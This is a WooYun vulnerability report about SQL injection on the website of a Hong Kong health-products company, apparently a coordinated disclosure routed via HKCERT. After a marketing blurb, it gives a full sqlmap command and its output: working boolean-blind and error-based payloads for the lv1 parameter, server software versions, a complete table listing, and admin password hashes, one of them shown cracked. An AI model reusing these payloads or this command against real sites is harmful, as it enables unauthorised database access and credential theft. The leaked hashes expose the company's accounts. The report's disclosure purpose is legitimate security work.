当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154512

漏洞标题:活力健國際有限公司主站存在SQL植入攻擊(可獲取admin及用戶密碼)(香港地區)

相关厂商:活力健國際有限公司

漏洞作者: 路人甲

提交时间:2015-11-20 11:57

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

活力健國際有限公司(下稱活力健)自成立以來,致力研發靈芝孢子對人類中樞、免疫等系統之效用,不僅開創靈芝孢子健康產品的先河,旗下品牌「2036」更成為香港著名的健康品牌。
活力健一直以提升大眾健康為己任,堅持以科研為本,並獲得中外多間醫學院及研究所大力支持,共同研發及引證產品的醫學功效。因此,旗下產品的品質、功效及安全性,絕對為權威保證。活力健在專注研究靈芝孢子的強大效用以外,同時致力將靈芝孢子與其他天然物質互相配合,成功研發『靈芝孢子系列』的產品,並得到科學研究證實其效用。其中,皇牌產品「靈芝孢子精華」及「靈芝孢子油」被證實能有效調控人體的中樞系統,並對免疫系統產生調控作用,對多種健康問題如肝問題等有顯著效果,能全面提昇整體健康。
活力健憑藉多年研發各種天然物質的治療及應用範圍的經驗,繼「靈芝孢子系列」後,成功研製了一系列從功能出發、針對身體特定機能需要以作助療的『專科系列』產品,包括能提昇視力、保護血管的「高清配方」、改善腸道機能的「益生菌配方」,以及有助排清體內毒素的「排毒配方」。未來會繼續推出不同的健康產品,以滿足不同人士的健康需要。
活力健為能全面關心了解顧客所需,特別成立「2036健之會」查詢熱線,並於分店遍佈全港的個人護理及健康零售商舖開設「2036健康資訊站」,方便顧客隨時向2036健康大使查詢有關產品及個人健康問題,獲取詳細講解。
展望未來,我們會繼續研發更多高質素之天然健康產品,以及提供更多元化的服務,貫徹實踐「以科研為本,將健康帶給大眾」的承諾。

详细说明:

地址:ttp://**.**.**.**/content/index.php?lang=2&lv1=5

python sqlmap.py -u "http://**.**.**.**/content/index.php?lang=2&lv1=5" -p lv1 --technique=BE --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

漏洞证明:

---
Parameter: lv1 (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: lang=2&lv1=-4511" OR 5602=5602#
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: lang=2&lv1=-7310" OR 1 GROUP BY CONCAT(0x71716b7071,(SELECT (CASE WHEN (5757=5757) THEN 1 ELSE 0 END)),0x716a707171,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.10, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.0
current user:    'web91u1@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'web91u1'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1634    |
| TABLES                                | 197     |
| KEY_COLUMN_USAGE                      | 176     |
| STATISTICS                            | 176     |
| TABLE_CONSTRAINTS                     | 176     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 16      |
| SCHEMATA                              | 3       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: web91db1
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| `2036_a5_radioProgramme`              | 183     |
| `2036_joinHealthClubMem`              | 80      |
| `2036_a5_radioProgramme_backup`       | 71      |
| `2036_a9_b3_c1_project`               | 61      |
| `2036_contentTable`                   | 51      |
| `2036_picNum`                         | 50      |
| `2036_a5_topic`                       | 35      |
| `2036_a7_b10_newsletter`              | 31      |
| `2036_layout`                         | 31      |
| allDay                                | 31      |
| `2036_a7_b11_symptom`                 | 28      |
| `2036_a10_homeNews`                   | 18      |
| `2036_a4_caseShare`                   | 16      |
| `2036_a8_b9_promotion`                | 16      |
| `2036_nav3Lv`                         | 14      |
| `2036_a6_disease`                     | 13      |
| `2036_a8_b9_promotion_backup`         | 13      |
| `2036_nav2Lv`                         | 13      |
| allMonth                              | 12      |
| `2036_a7_b11_occupation`              | 11      |
| `2036_a9_b2_award`                    | 10      |
| `2036_nav1Lv`                         | 10      |
| `2036_a10_homeProduct`                | 9       |
| `2036_a8_b8_productKnowledgeContent`  | 9       |
| `2036_footerAward`                    | 9       |
| `2036_a9_b4_news`                     | 7       |
| allDate                               | 7       |
| `2036_a7_b11_education`               | 6       |
| `2036_a7_b11_reachUs`                 | 6       |
| `2036_a7_b11_salary`                  | 6       |
| `2036_footerNav`                      | 6       |
| `2036_a10_mv`                         | 5       |
| `2036_a10_sideBanner`                 | 4       |
| `2036_a7_b11_contactMethod`           | 4       |
| `2036_a9_b2_qualification`            | 4       |
| `2036_a1_youtubeLink`                 | 3       |
| `2036_a7_b11_referralCompany`         | 3       |
| `2036_a9_b27_qualification`           | 3       |
| `2036_admin`                          | 3       |
| `2036_lang`                           | 3       |
| `2036_nav4Lv`                         | 3       |
| `2036_a3_sellSpot`                    | 2       |
| `2036_a5_pageImage`                   | 2       |
| `2036_a7_b11_gender`                  | 2       |
| `2036_a8_b7_pageImage`                | 2       |
| `2036_a8_b9_pageImage`                | 2       |
| `2036_a9_b1_txtPic`                   | 2       |
| `2036_a9_b3_c1_pageTxt`               | 2       |
| `2036_footer1Lv`                      | 2       |
| `2036_footerTNC`                      | 2       |
| `2036_a10_homeYoutube`                | 1       |
| `2036_a10_seo`                        | 1       |
| `2036_a10_topIcon`                    | 1       |
| `2036_a10_video`                      | 1       |
| `2036_a10_youtube`                    | 1       |
| `2036_a13_addTextField`               | 1       |
| `2036_a1_keyVisual`                   | 1       |
| `2036_a2_addTextField`                | 1       |
| `2036_a2_keyVisual`                   | 1       |
| `2036_a3_addTextField`                | 1       |
| `2036_a3_keyVisual`                   | 1       |
| `2036_a4_addTextField`                | 1       |
| `2036_a4_button`                      | 1       |
| `2036_a4_keyVisual`                   | 1       |
| `2036_a5_addTextField`                | 1       |
| `2036_a5_keyVisual`                   | 1       |
| `2036_a6_b13_disease`                 | 1       |
| `2036_a6_b14_disease`                 | 1       |
| `2036_a6_b15_disease`                 | 1       |
| `2036_a6_b16_disease`                 | 1       |
| `2036_a6_b17_disease`                 | 1       |
| `2036_a6_b18_disease`                 | 1       |
| `2036_a6_b19_disease`                 | 1       |
| `2036_a6_b20_disease`                 | 1       |
| `2036_a6_b21_disease`                 | 1       |
| `2036_a6_b22_disease`                 | 1       |
| `2036_a6_b23_disease`                 | 1       |
| `2036_a6_b24_disease`                 | 1       |
| `2036_a6_b25_disease`                 | 1       |
| `2036_a6_keyVisual`                   | 1       |
| `2036_a6_pageImage`                   | 1       |
| `2036_a6_txtPic`                      | 1       |
| `2036_a7_b10_addTextField`            | 1       |
| `2036_a7_b10_keyVisual`               | 1       |
| `2036_a7_b11_addTextField`            | 1       |
| `2036_a7_b11_c14_addTextField`        | 1       |
| `2036_a7_b11_c14_keyVisual`           | 1       |
| `2036_a7_b11_keyVisual`               | 1       |
| `2036_a7_b11_pageTxt`                 | 1       |
| `2036_a7_b12_button`                  | 1       |
| `2036_a7_b12_googleMap`               | 1       |
| `2036_a7_b12_keyVisual`               | 1       |
| `2036_a7_b12_pageImage`               | 1       |
| `2036_a7_b12_pageTxt`                 | 1       |
| `2036_a7_b12_txtPic`                  | 1       |
| `2036_a7_b26_pageTxt`                 | 1       |
| `2036_a7_b28_button`                  | 1       |
| `2036_a7_b28_googleMap`               | 1       |
| `2036_a7_b28_keyVisual`               | 1       |
| `2036_a7_b28_pageImage`               | 1       |
| `2036_a7_b28_pageTxt`                 | 1       |
| `2036_a7_b29_addTextField`            | 1       |
| `2036_a7_b30_addTextField`            | 1       |
| `2036_a7_b30_pageTxt`                 | 1       |
| `2036_a7_button`                      | 1       |
| `2036_a7_keyVisual`                   | 1       |
| `2036_a7_txtPic`                      | 1       |
| `2036_a8_b6_c10_button`               | 1       |
| `2036_a8_b6_c10_product`              | 1       |
| `2036_a8_b6_c11_button`               | 1       |
| `2036_a8_b6_c12_button`               | 1       |
| `2036_a8_b6_c12_product`              | 1       |
| `2036_a8_b6_c13_button`               | 1       |
| `2036_a8_b6_c13_product`              | 1       |
| `2036_a8_b6_c15_button`               | 1       |
| `2036_a8_b6_c15_product`              | 1       |
| `2036_a8_b6_c9_button`                | 1       |
| `2036_a8_b6_c9_product`               | 1       |
| `2036_a8_b6_keyVisual`                | 1       |
| `2036_a8_b6_pageTxt`                  | 1       |
| `2036_a8_b7_c4_button`                | 1       |
| `2036_a8_b7_c4_product`               | 1       |
| `2036_a8_b7_c5_button`                | 1       |
| `2036_a8_b7_c5_product`               | 1       |
| `2036_a8_b7_c6_button`                | 1       |
| `2036_a8_b7_c6_product`               | 1       |
| `2036_a8_b7_c7_button`                | 1       |
| `2036_a8_b7_c7_product`               | 1       |
| `2036_a8_b7_c8_button`                | 1       |
| `2036_a8_b7_c8_product`               | 1       |
| `2036_a8_b7_keyVisual`                | 1       |
| `2036_a8_b7_pageTxt`                  | 1       |
| `2036_a8_b8_keyVisual`                | 1       |
| `2036_a8_b8_pageImage`                | 1       |
| `2036_a8_b8_pageTxt`                  | 1       |
| `2036_a8_b9_keyVisual`                | 1       |
| `2036_a9_b1_keyVisual`                | 1       |
| `2036_a9_b27_addTextField`            | 1       |
| `2036_a9_b27_keyVisual`               | 1       |
| `2036_a9_b2_addTextField`             | 1       |
| `2036_a9_b2_keyVisual`                | 1       |
| `2036_a9_b2_txtPic`                   | 1       |
| `2036_a9_b3_c1_pageImage`             | 1       |
| `2036_a9_b3_c2_pageImage`             | 1       |
| `2036_a9_b3_c2_pageTxt`               | 1       |
| `2036_a9_b3_c3_d1_contentTxtPic`      | 1       |
| `2036_a9_b3_c3_d2_contentTxtPic`      | 1       |
| `2036_a9_b3_c3_d3_contentTxtPic`      | 1       |
| `2036_a9_b3_c3_pageTxt`               | 1       |
| `2036_a9_b3_keyVisual`                | 1       |
| `2036_a9_b3_pageTxt`                  | 1       |
| `2036_a9_b4_keyVisual`                | 1       |
| `2036_a9_b5_keyVisual`                | 1       |
| `2036_a9_b5_pageImage`                | 1       |
| `2036_a9_b5_pageImageLang`            | 1       |
| `2036_a9_b5_pageTxt`                  | 1       |
| `2036_a_TNC`                          | 1       |
| `2036_adminEmail`                     | 1       |
| `2036_footerCopyright`                | 1       |
| `2036_joinClubEmail`                  | 1       |
| `2036_topIcon`                        | 1       |
| `2036_topLogo`                        | 1       |
| News                                  | 1       |
| NewsNode                              | 1       |
| NewsNode_seq                          | 1       |
| Password                              | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: web91db1
Table: 2036_admin
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: web91db1
Table: Password
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: web91db1
Table: 2036_admin
[3 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 04494d0e25d0dc80e85c451baf5f9abe |
| bc111e1efb90a2094a34e20bee0e1844 |
| bc111e1efb90a2094a34e20bee0e1844 |
+----------------------------------+
Database: web91db1
Table: Password
[1 entry]
+------------------------------------------+
| password                                 |
+------------------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin) |
+------------------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-24 12:02

厂商回复:

Referred to related parties.

最新状态:

暂无